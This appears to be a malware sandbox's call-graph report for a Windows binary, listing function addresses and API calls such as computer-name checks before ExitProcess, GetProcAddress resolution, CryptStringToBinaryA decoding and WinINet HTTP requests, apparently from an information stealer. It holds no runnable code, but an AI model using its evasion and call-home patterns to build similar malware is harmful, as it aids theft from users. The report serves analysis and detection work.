26758 4035a5 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 4035be 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 4035d7 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 4035f0 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 403609 26765->26766 26767 4045c0 34 API calls 26766->26767 26768 403622 26767->26768 26769 4045c0 34 API calls 26768->26769 26770 40363b 26769->26770 26771 4045c0 34 API calls 26770->26771 26772 403654 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 40366d 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 403686 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 40369f 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 4036b8 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 4036d1 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 4036ea 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 403703 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 40371c 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 403735 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 40374e 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 403767 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 403780 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 403799 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 4037b2 26799->26800 26801 4045c0 34 API calls 26800->26801 26802 4037cb 26801->26802 26803 4045c0 34 API calls 26802->26803 26804 4037e4 26803->26804 26805 4045c0 34 API calls 26804->26805 26806 4037fd 26805->26806 26807 4045c0 34 API calls 26806->26807 26808 403816 26807->26808 26809 4045c0 34 API calls 26808->26809 26810 40382f 26809->26810 26811 4045c0 34 API calls 26810->26811 26812 403848 26811->26812 26813 4045c0 34 API calls 26812->26813 26814 403861 26813->26814 26815 4045c0 34 API calls 26814->26815 26816 40387a 26815->26816 26817 4045c0 34 API calls 26816->26817 26818 403893 26817->26818 26819 4045c0 34 API calls 26818->26819 26820 4038ac 26819->26820 26821 4045c0 34 API calls 26820->26821 26822 4038c5 26821->26822 26823 4045c0 34 API calls 26822->26823 26824 4038de 26823->26824 26825 4045c0 34 API calls 26824->26825 26826 4038f7 26825->26826 26827 4045c0 34 API calls 26826->26827 26828 403910 26827->26828 26829 4045c0 34 API calls 26828->26829 26830 403929 26829->26830 26831 4045c0 34 API calls 26830->26831 26832 403942 26831->26832 26833 4045c0 34 API calls 26832->26833 26834 40395b 26833->26834 26835 4045c0 34 API calls 26834->26835 26836 403974 26835->26836 26837 4045c0 34 API calls 26836->26837 26838 40398d 26837->26838 26839 4045c0 34 API calls 26838->26839 26840 4039a6 26839->26840 26841 4045c0 34 API calls 26840->26841 26842 4039bf 26841->26842 26843 4045c0 34 API calls 26842->26843 26844 4039d8 26843->26844 26845 4045c0 34 API calls 26844->26845 26846 4039f1 26845->26846 26847 4045c0 34 API calls 26846->26847 26848 403a0a 26847->26848 26849 4045c0 34 API calls 26848->26849 26850 403a23 26849->26850 26851 4045c0 34 API calls 26850->26851 26852 403a3c 26851->26852 26853 4045c0 34 API calls 26852->26853 26854 403a55 26853->26854 26855 4045c0 34 API calls 26854->26855 26856 403a6e 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 403a87 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 403aa0 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 403ab9 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 403ad2 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 403aeb 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 403b04 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 403b1d 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 403b36 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 403b4f 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 403b68 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 403b81 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 403b9a 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 403bb3 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 403bcc 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 403be5 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 403bfe 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 403c17 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 403c30 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 403c49 26893->26894 26895 4045c0 34 API calls 26894->26895 26896 403c62 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 403c7b 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 403c94 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 403cad 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 403cc6 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 403cdf 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 403cf8 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 403d11 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 403d2a 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 403d43 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 403d5c 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 403d75 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 403d8e 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 403da7 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 403dc0 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 403dd9 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 403df2 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 403e0b 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 403e24 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 403e3d 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 403e56 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 403e6f 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 403e88 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 403ea1 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 403eba 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 403ed3 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 403eec 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 403f05 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 403f1e 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 403f37 26953->26954 26955 4045c0 34 API calls 26954->26955 26956 403f50 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 403f69 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 403f82 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 403f9b 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 403fb4 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 403fcd 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 403fe6 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 403fff 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 404018 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 404031 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 40404a 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 404063 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 40407c 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 404095 26981->26982 26983 4045c0 34 API calls 26982->26983 26984 4040ae 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 4040c7 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 4040e0 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 4040f9 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 404112 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 40412b 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 404144 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 40415d 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 404176 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 40418f 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 4041a8 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 4041c1 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 4041da 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 4041f3 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 40420c 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 404225 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 40423e 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 404257 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 404270 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 404289 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 4042a2 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 4042bb 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 4042d4 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 4042ed 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 404306 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 40431f 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 404338 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 404351 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 40436a 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 404383 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 40439c 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 4043b5 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 4043ce 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 4043e7 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 404400 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 404419 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 404432 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 40444b 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 404464 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 40447d 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 404496 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 4044af 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 4044c8 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 4044e1 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 4044fa 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 404513 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 40452c 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 404545 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 40455e 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 404577 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 404590 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 4045a9 27085->27086 27087 419c10 27086->27087 27088 419c20 43 API calls 27087->27088 27089 41a036 8 API calls 27087->27089 27088->27089 27090 41a146 27089->27090 27091 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27089->27091 27092 41a153 8 API calls 27090->27092 27093 41a216 27090->27093 27091->27090 27092->27093 27094 41a298 27093->27094 27095 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27093->27095 27096 41a2a5 6 API calls 27094->27096 27097 41a337 27094->27097 27095->27094 27096->27097 27098 41a344 9 API calls 27097->27098 27099 41a41f 27097->27099 27098->27099 27100 41a4a2 27099->27100 27101 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27099->27101 27102 41a4ab GetProcAddress GetProcAddress 27100->27102 27103 41a4dc 27100->27103 27101->27100 27102->27103 27104 41a515 27103->27104 27105 41a4e5 GetProcAddress GetProcAddress 27103->27105 27106 41a612 27104->27106 27107 41a522 10 API calls 27104->27107 27105->27104 27108 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27106->27108 27109 41a67d 27106->27109 27107->27106 27108->27109 27110 41a686 GetProcAddress 27109->27110 27111 41a69e 27109->27111 27110->27111 27112 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27111->27112 27113 415ca3 27111->27113 27112->27113 27114 401590 27113->27114 27389 401670 27114->27389 27117 41a7a0 lstrcpy 27118 4015b5 27117->27118 27119 41a7a0 lstrcpy 27118->27119 27120 4015c7 27119->27120 27121 41a7a0 lstrcpy 27120->27121 27122 4015d9 27121->27122 27123 41a7a0 lstrcpy 27122->27123 27124 401663 27123->27124 27125 415510 27124->27125 27126 415521 27125->27126 27127 41a820 2 API calls 27126->27127 27128 41552e 27127->27128 27129 41a820 2 API calls 27128->27129 27130 41553b 27129->27130 27131 41a820 2 API calls 27130->27131 27132 415548 27131->27132 27133 41a740 lstrcpy 27132->27133 27134 415555 27133->27134 27135 41a740 lstrcpy 27134->27135 27136 415562 27135->27136 27137 41a740 lstrcpy 27136->27137 27138 41556f 27137->27138 27139 41a740 lstrcpy 27138->27139 27144 41557c 27139->27144 27140 41a740 lstrcpy 27140->27144 27141 415643 StrCmpCA 27141->27144 27142 4156a0 StrCmpCA 27143 4157dc 27142->27143 27142->27144 27145 41a8a0 lstrcpy 27143->27145 27144->27140 27144->27141 27144->27142 27147 41a820 lstrlenA lstrcpy 27144->27147 27150 415856 StrCmpCA 27144->27150 27155 401590 lstrcpy 27144->27155 27159 415a0b StrCmpCA 27144->27159 27160 4152c0 29 API calls 27144->27160 27173 41a8a0 lstrcpy 27144->27173 27174 41578a StrCmpCA 27144->27174 27176 41a7a0 lstrcpy 27144->27176 27177 41593f StrCmpCA 27144->27177 27178 4151f0 23 API calls 27144->27178 27146 4157e8 27145->27146 27148 41a820 2 API calls 27146->27148 27147->27144 27149 4157f6 27148->27149 27152 41a820 2 API calls 27149->27152 27150->27144 27151 415991 27150->27151 27153 41a8a0 lstrcpy 27151->27153 27154 415805 27152->27154 27156 41599d 27153->27156 27157 401670 lstrcpy 27154->27157 27155->27144 27158 41a820 2 API calls 27156->27158 27179 415811 27157->27179 27161 4159ab 27158->27161 27162 415a16 Sleep 27159->27162 27163 415a28 27159->27163 27160->27144 27164 41a820 2 API calls 27161->27164 27162->27144 27165 41a8a0 lstrcpy 27163->27165 27166 4159ba 27164->27166 27168 415a34 27165->27168 27167 401670 lstrcpy 27166->27167 27167->27179 27169 41a820 2 API calls 27168->27169 27170 415a43 27169->27170 27171 41a820 2 API calls 27170->27171 27172 415a52 27171->27172 27175 401670 lstrcpy 27172->27175 27173->27144 27174->27144 27175->27179 27176->27144 27177->27144 27178->27144 27179->26233 27181 417553 GetVolumeInformationA 27180->27181 27182 41754c 27180->27182 27186 417591 27181->27186 27182->27181 27183 4175fc GetProcessHeap HeapAlloc 27184 417619 27183->27184 27185 417628 wsprintfA 27183->27185 27187 41a740 lstrcpy 27184->27187 27188 41a740 lstrcpy 27185->27188 27186->27183 27189 415da7 27187->27189 27188->27189 27189->26254 27191 41a7a0 lstrcpy 27190->27191 27192 404899 27191->27192 27398 4047b0 27192->27398 27194 4048a5 27195 41a740 lstrcpy 27194->27195 27196 4048d7 27195->27196 27197 41a740 lstrcpy 27196->27197 27198 4048e4 27197->27198 27199 41a740 lstrcpy 27198->27199 27200 4048f1 27199->27200 27201 41a740 lstrcpy 27200->27201 27202 4048fe 27201->27202 27203 41a740 lstrcpy 27202->27203 27204 40490b InternetOpenA StrCmpCA 27203->27204 27205 404944 27204->27205 27206 404955 27205->27206 27207 404ecb InternetCloseHandle 27205->27207 27411 418b60 GetSystemTime lstrcpy lstrcpy 27206->27411 27208 404ee8 27207->27208 27406 409ac0 CryptStringToBinaryA 27208->27406 27210 404963 27412 41a920 lstrcpy lstrcpy lstrcatA 27210->27412 27213 404976 27215 41a8a0 lstrcpy 27213->27215 27220 40497f 27215->27220 27216 41a820 2 API calls 27217 404f05 27216->27217 27219 41a9b0 4 API calls 27217->27219 27218 404f27 ctype 27222 41a7a0 lstrcpy 27218->27222 27221 404f1b 27219->27221 27224 41a9b0 4 API calls 27220->27224 27223 41a8a0 lstrcpy 27221->27223 27235 404f57 27222->27235 27223->27218 27225 4049a9 27224->27225 27226 41a8a0 lstrcpy 27225->27226 27227 4049b2 27226->27227 27228 41a9b0 4 API calls 27227->27228 27229 4049d1 27228->27229 27230 41a8a0 lstrcpy 27229->27230 27231 4049da 27230->27231 27413 41a920 lstrcpy lstrcpy lstrcatA 27231->27413 27233 4049f8 27234 41a8a0 lstrcpy 27233->27234 27236 404a01 27234->27236 27235->26257 27237 41a9b0 4 API calls 27236->27237 27238 404a20 27237->27238 27239 41a8a0 lstrcpy 27238->27239 27240 404a29 27239->27240 27241 41a9b0 4 API calls 27240->27241 27242 404a48 27241->27242 27243 41a8a0 lstrcpy 27242->27243 27244 404a51 27243->27244 27245 41a9b0 4 API calls 27244->27245 27246 404a7d 27245->27246 27414 41a920 lstrcpy lstrcpy lstrcatA 27246->27414 27248 404a84 27249 41a8a0 lstrcpy 27248->27249 27250 404a8d 27249->27250 27251 404aa3 InternetConnectA 27250->27251 27251->27207 27252 404ad3 HttpOpenRequestA 27251->27252 27254 404b28 27252->27254 27255 404ebe InternetCloseHandle 27252->27255 27256 41a9b0 4 API calls 27254->27256 27255->27207 27257 404b3c 27256->27257 27258 41a8a0 lstrcpy 27257->27258 27259 404b45 27258->27259 27415 41a920 lstrcpy lstrcpy lstrcatA 27259->27415 27261 404b63 27262 41a8a0 lstrcpy 27261->27262 27263 404b6c 27262->27263 27264 41a9b0 4 API calls 27263->27264 27265 404b8b 27264->27265 27266 41a8a0 lstrcpy 27265->27266 27267 404b94 27266->27267 27268 41a9b0 4 API calls 27267->27268 27269 404bb5 27268->27269 27270 41a8a0 lstrcpy 27269->27270 27271 404bbe 27270->27271 27272 41a9b0 4 API calls 27271->27272 27273 404bde 27272->27273 27274 41a8a0 lstrcpy 27273->27274 27275 404be7 27274->27275 27276 41a9b0 4 API calls 27275->27276 27277 404c06 27276->27277 27278 41a8a0 lstrcpy 27277->27278 27279 404c0f 27278->27279 27416 41a920 lstrcpy lstrcpy lstrcatA 27279->27416 27281 404c2d 27282 41a8a0 lstrcpy 27281->27282 27283 404c36 27282->27283 27284 41a9b0 4 API calls 27283->27284 27285 404c55 27284->27285 27286 41a8a0 lstrcpy 27285->27286 27287 404c5e 27286->27287 27288 41a9b0 4 API calls 27287->27288 27289 404c7d 27288->27289 27290 41a8a0 lstrcpy 27289->27290 27291 404c86 27290->27291 27417 41a920 lstrcpy lstrcpy lstrcatA 27291->27417 27293 404ca4 27294 41a8a0 lstrcpy 27293->27294 27295 404cad 27294->27295 27296 41a9b0 4 API calls 27295->27296 27297 404ccc 27296->27297 27298 41a8a0 lstrcpy 27297->27298 27299 404cd5 27298->27299 27300 41a9b0 4 API calls 27299->27300 27301 404cf6 27300->27301 27302 41a8a0 lstrcpy 27301->27302 27303 404cff 27302->27303 27304 41a9b0 4 API calls 27303->27304 27305 404d1f 27304->27305 27306 41a8a0 lstrcpy 27305->27306 27307 404d28 27306->27307 27308 41a9b0 4 API calls 27307->27308 27309 404d47 27308->27309 27310 41a8a0 lstrcpy 27309->27310 27311 404d50 27310->27311 27418 41a920 lstrcpy lstrcpy lstrcatA 27311->27418 27313 404d6e 27314 41a8a0 lstrcpy 27313->27314 27315 404d77 27314->27315 27316 41a740 lstrcpy 27315->27316 27317 404d92 27316->27317 27419 41a920 lstrcpy lstrcpy lstrcatA 27317->27419 27319 404db3 27420 41a920 lstrcpy lstrcpy lstrcatA 27319->27420 27321 404dba 27322 41a8a0 lstrcpy 27321->27322 27323 404dc6 27322->27323 27324 404de7 lstrlenA 27323->27324 27325 404dfa 27324->27325 27326 404e03 lstrlenA 27325->27326 27421 41aad0 27326->27421 27328 404e13 HttpSendRequestA 27329 404e32 InternetReadFile 27328->27329 27330 404e67 InternetCloseHandle 27329->27330 27335 404e5e 27329->27335 27333 41a800 27330->27333 27332 41a9b0 4 API calls 27332->27335 27333->27255 27334 41a8a0 lstrcpy 27334->27335 27335->27329 27335->27330 27335->27332 27335->27334 27426 41aad0 27336->27426 27338 4117c4 StrCmpCA 27339 4117d7 27338->27339 27340 4117cf ExitProcess 27338->27340 27341 4117e7 strtok_s 27339->27341 27344 4117f4 27341->27344 27342 4119c2 27342->26259 27343 41199e strtok_s 27343->27344 27344->27342 27344->27343 27345 4118ad StrCmpCA 27344->27345 27346 4118cf StrCmpCA 27344->27346 27347 4118f1 StrCmpCA 27344->27347 27348 411951 StrCmpCA 27344->27348 27349 411970 StrCmpCA 27344->27349 27350 411913 StrCmpCA 27344->27350 27351 411932 StrCmpCA 27344->27351 27352 41185d StrCmpCA 27344->27352 27353 41187f StrCmpCA 27344->27353 27354 41a820 lstrlenA lstrcpy 27344->27354 27355 41a820 2 API calls 27344->27355 27345->27344 27346->27344 27347->27344 27348->27344 27349->27344 27350->27344 27351->27344 27352->27344 27353->27344 27354->27344 27355->27343 27356->26265 27357->26267 27358->26273 27359->26275 27360->26281 27361->26283 27362->26287 27363->26291 27364->26295 27365->26301 27366->26303 27367->26307 27368->26320 27369->26324 27370->26325 27371->26321 27372->26325 27373->26340 27374->26327 27375->26331 27376->26332 27377->26337 27378->26342 27379->26344 27380->26351 27381->26358 27382->26378 27383->26382 27384->26381 27385->26377 27386->26381 27387->26391 27390 41a7a0 lstrcpy 27389->27390 27391 401683 27390->27391 27392 41a7a0 lstrcpy 27391->27392 27393 401695 27392->27393 27394 41a7a0 lstrcpy 27393->27394 27395 4016a7 27394->27395 27396 41a7a0 lstrcpy 27395->27396 27397 4015a3 27396->27397 27397->27117 27422 401030 27398->27422 27402 404838 lstrlenA 27425 41aad0 27402->27425 27404 404848 InternetCrackUrlA 27405 404867 27404->27405 27405->27194 27407 409af9 LocalAlloc 27406->27407 27408 404eee 27406->27408 27407->27408 27409 409b14 CryptStringToBinaryA 27407->27409 27408->27216 27408->27218 27409->27408 27410 409b39 LocalFree 27409->27410 27410->27408 27411->27210 27412->27213 27413->27233 27414->27248 27415->27261 27416->27281 27417->27293 27418->27313 27419->27319 27420->27321 27421->27328 27423 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27422->27423 27424 41aad0 27423->27424 27424->27402 27425->27404 27426->27338 27557 416ab1 902 API calls 27531 4069f3 7 API calls 27499 47f15b3 strtok_s 27593 47f13c7 strtok_s strtok_s lstrlen lstrcpy 27454 2bb9f06 27455 2bb9f15 27454->27455 27458 2bba6a6 27455->27458 27460 2bba6c1 27458->27460 27459 2bba6ca CreateToolhelp32Snapshot 27459->27460 27461 2bba6e6 Module32First 27459->27461 27460->27459 27460->27461 27462 2bb9f1e 27461->27462 27463 2bba6f5 27461->27463 27465 2bba365 27463->27465 27466 2bba390 27465->27466 27467 2bba3d9 27466->27467 27468 2bba3a1 VirtualAlloc 27466->27468 27467->27467 27468->27467 27562 41cafe 219 API calls 5 library calls 27564 47e6ebc VirtualProtect 27500 47f04b7 88 API calls 27501 47f0cb6 30 API calls 25997 401190 26004 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 25997->26004 25999 40119e 26000 4011cc 25999->26000 26006 417850 GetProcessHeap HeapAlloc GetUserNameA 25999->26006 26002 4011b7 26002->26000 26003 4011c4 ExitProcess 26002->26003 26005 417939 26004->26005 26005->25999 26007 4178c3 26006->26007 26007->26002 27502 47fd0af RtlLeaveCriticalSection _raise 27567 47f32ae 22 API calls 27503 47f140b StrCmpCA strtok_s lstrlen lstrcpy 27568 41ce9f 69 API calls __amsg_exit 27534 47fcd90 173 API calls 3 library calls 27505 4088a4 RaiseException task __CxxThrowException@8 27506 4180a5 GetProcessHeap HeapFree 27570 47f0297 149 API calls 27572 47fae93 43 API calls 2 library calls 27535 47fcd8f 6 API calls 2 library calls 27508 47f102b StrCmpCA strtok_s 27536 41b9b0 RtlUnwind 27537 47f118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27509 47f3823 StrCmpCA StrCmpCA StrCmpCA strtok_s

                                              Control-flow Graph

                                              APIs
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                              • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                              • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                              • strlen.MSVCRT ref: 004046F0
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
